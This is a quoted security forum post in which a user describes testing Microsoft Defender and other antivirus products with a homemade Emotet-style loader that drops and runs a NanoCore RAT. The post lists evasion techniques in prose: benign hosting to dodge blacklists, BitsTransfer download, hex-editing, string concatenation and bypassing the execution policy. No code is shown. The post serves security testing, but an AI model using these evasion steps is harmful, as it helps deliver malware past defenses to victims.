Forums
New posts
Search forums
News
Security News
Technology News
Giveaways
Giveaways, Promotions and Contests
Discounts & Deals
Reviews
Users Reviews
Video Reviews
Support
Windows Malware Removal Help & Support
Inactive Support Threads
Mac Malware Removal Help & Support
Mobile Malware Removal Help & Support
Blog
Log in
Register
What's new
Search
Search titles only
By:
Search titles only
By:
Reply to thread
Menu
Install the app
Install
JavaScript is disabled. For a better experience, please enable JavaScript in your browser before proceeding.
You are using an out of date browser. It may not display this or other websites correctly.
You should upgrade or use an
alternative browser
.
Forums
Security
Security Statistics and Reports
Microsoft Defender - pros and cons (November 2020)
Message
<blockquote data-quote="ForgottenSeer 89360" data-source="post: 914029"><p>The sample imitates an Emotet loader, in fact I got inspired by Emotet, which Microsoft claims to have blocked with machine learning model in seconds... there was this sort of post on their blog, if I am not mistaken. Hope the Emotet team doesn’t come after me with copyright claims <img class="smilie smilie--emoji" loading="lazy" alt="😆" title="Grinning squinting face :laughing:" src="https://cdn.jsdelivr.net/joypixels/assets/6.6/png/unicode/64/1f606.png" data-shortname=":laughing:" /></p><p></p><p>So I downloaded a malicious sample and uploaded it on a benign website (won’t disclose all details for security reasons). This way I bypassed web filter blacklists</p><p>The Emotet loader simulator uses BitsTransfer (Emotet uses System.Net.WebClient) to download the malicious file and write it on the Desktop. Writing to the desktop decreases machine learning sensitivity as opposed to writing in temp folder or somewhere else.</p><p>To make things a bit more interesting, I used a hex editor to modify slightly the malicious file downloaded, which bypassed any reputation technologies. Finally, PowerShell executes the sample. To decrease machine learning sensitivity throughout the whole process, on the second sample, I’ve removed attributes such as hidden window, no exit and others.</p><p>I used a tool widely available on the web to obfuscate the code, just like Emotet creators do. It hasn’t been encoded with base64 (unlike Emotet) but has been concatenated, which makes it human unreadable and also, bypasses signatures and heuristics. To bypass the execution policy, I ran the code as an argument, not as a script.</p><p>It took me less than 20 minutes to do all that and the result - few of them failed already. The malicious sample was a variant of nanocore rat (known for its privilege escalation) and was successfully executed in all test cases. There was not even a UAC prompt. Avast’s IDP kicked in and removed nanocore, but wasn’t smart enough to correlate it to my loader. Defender and Malwarebytes did nothing. Kaspersky detected everything upfront (on VirusTotal), Eset detected the first one, probably due to attributes, commonly used by malware. That’s on VirusTotal again.</p></blockquote><p></p>
[QUOTE="ForgottenSeer 89360, post: 914029"] The sample imitates an Emotet loader, in fact I got inspired by Emotet, which Microsoft claims to have blocked with machine learning model in seconds... there was this sort of post on their blog, if I am not mistaken. Hope the Emotet team doesn’t come after me with copyright claims 😆 So I downloaded a malicious sample and uploaded it on a benign website (won’t disclose all details for security reasons). This way I bypassed web filter blacklists The Emotet loader simulator uses BitsTransfer (Emotet uses System.Net.WebClient) to download the malicious file and write it on the Desktop. Writing to the desktop decreases machine learning sensitivity as opposed to writing in temp folder or somewhere else. To make things a bit more interesting, I used a hex editor to modify slightly the malicious file downloaded, which bypassed any reputation technologies. Finally, PowerShell executes the sample. To decrease machine learning sensitivity throughout the whole process, on the second sample, I’ve removed attributes such as hidden window, no exit and others. I used a tool widely available on the web to obfuscate the code, just like Emotet creators do. It hasn’t been encoded with base64 (unlike Emotet) but has been concatenated, which makes it human unreadable and also, bypasses signatures and heuristics. To bypass the execution policy, I ran the code as an argument, not as a script. It took me less than 20 minutes to do all that and the result - few of them failed already. The malicious sample was a variant of nanocore rat (known for its privilege escalation) and was successfully executed in all test cases. There was not even a UAC prompt. Avast’s IDP kicked in and removed nanocore, but wasn’t smart enough to correlate it to my loader. Defender and Malwarebytes did nothing. Kaspersky detected everything upfront (on VirusTotal), Eset detected the first one, probably due to attributes, commonly used by malware. That’s on VirusTotal again. [/QUOTE]
Insert quotes…
Verification
Post reply
Top
